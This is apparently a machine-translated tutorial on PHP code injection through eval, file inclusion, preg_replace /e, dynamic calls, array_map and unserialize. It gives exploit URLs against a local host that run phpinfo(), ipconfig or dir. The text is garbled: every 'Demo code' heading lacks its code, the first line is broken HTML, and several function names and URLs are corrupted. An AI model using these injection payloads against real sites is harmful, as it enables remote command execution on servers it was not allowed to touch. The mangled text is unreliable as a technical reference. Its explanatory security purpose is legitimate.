A code execution function a function that can be executed in PHP. Democode1.1, such as eval (), assert (), '', system (), exec (), shell_exec (), passthru (), escapeshellcmd (), and pcntl_exec: the second file contains code injection... "> <LINKhr
Code execution function
Functions that can execute code in PHP. Such as eval (), assert (), '', system (), exec (), shell_exec (), passthru (), escapeshellcmd (), pcntl_exec (), etc.
Demo code 1.1:
2. file inclusion code injection
File contains code injection of functions under specific conditions, such as include (), include_once (), require (), and require_once ().
When allow_url_include = On and PHP Version> = 5.2.0, code injection occurs.
Demo code 2.1:
Access http: // 127.0.0.1/include. php? A = data: text/plain, % 3C? Php % 20 phpinfo % 28% 29 ;? % 3E:
Run phpinfo ().
Three-regular expression matching code injection
Code injection caused by the well-known preg_replace () function. When the/e pattern modifier exists in pattern, code execution is allowed. We will discuss this in three cases.
3.1 preg_replace () pattern parameter injection
Pattern is the code injection of the first parameter.
When magic_quotes_gpc = Off, the code is executed.
Demo code 3.1:
Access http: // 127.0.0.1/preg_replace1.php? Reg = % 3C \/php % 3E/e that is
Run phpinfo ().
3.2 preg_replace () replacement parameter injection
Replacement is the code injection of the second parameter, resulting in code execution.
Demo code 3.2:
When we submit http: // 127.0.0.1/preg_replace2.php? H = phpinfo () that is
Run phpinfo ().
3.3 preg_replace () injection of the third parameter
We construct the subject parameter to execute the code. Submit: http: // 127.0.0.1/preg_replace3.php? H =
Phpinfo ()
Or http: // 127.0.0.1/preg_replace3.php? H =
$ {Phpinfo % 28% 29}
Cause code execution
Demo code 3.3:
4. dynamic code execution
4.1 Dynamic variable code execution
Demo code 4.1:
We submit http: // 127.0.0.1/dyn_func.php? Dyn_func = system & argument = ipconfig execute the ipconfig command
4.2 Dynamic function code execution
Demo code 4.2:
We submit http: // 127.0.0.1/create_function.php? Foobar = system % 28dir % 29 run the dir command
Five others
5.1 code execution of the ob_start () function
Demo code 5.1:
5.2 code execution of the array_map () function
Demo code 5.2:
We submit http: // 127.0.0.1/array_map.php? Callback = phpinfo: execute phpinfo ().
5.3 unserialize () and eval ()
Unserialize () is a function with high usage in PHP. Improper use of unserialize () may cause security risks.
We submit http: // 127.0.0.1/unserialize. php? Saved_code = O: 7: % 22 Example % 22: 1: {s: 3: % 22var % 22; s: 10: % 22 phpinfo % 28% 29; % 22 ;} execute phpinfo ().
5.4 functions that may easily cause security problems
There are many functions of the same type
Array_map ()
Usort (), uasort (), uksort ()
Array_filter ()
Array_reduce ()
Array_diff_uassoc (), array_diff_ukey ()
Array_udiff (), array_udiff_assoc (), array_udiff_uassoc ()
Array_intersect_assoc (), array_intersect_uassoc ()
Array_uintersect (), array_uintersect_assoc (), array_uintersect_uassoc ()
Array_walk (), array_pai_recursive ()
Xml_set_character_data_handler ()
Xml_set_default_handler ()
Xml_set_element_handler ()
Xml_set_end_namespace_decl_handler ()
Xml_set_external_entity_ref_handler ()
Xml_set_notation_decl_handler ()
Xml_set_processing_instruction_handler ()
Xml_set_start_namespace_decl_handler ()
Xml_set_unparsed_entity_decl_handler ()
Stream_filter_register ()
Set_error_handler ()
Register_shutdown_function ()
Register_tick_function ()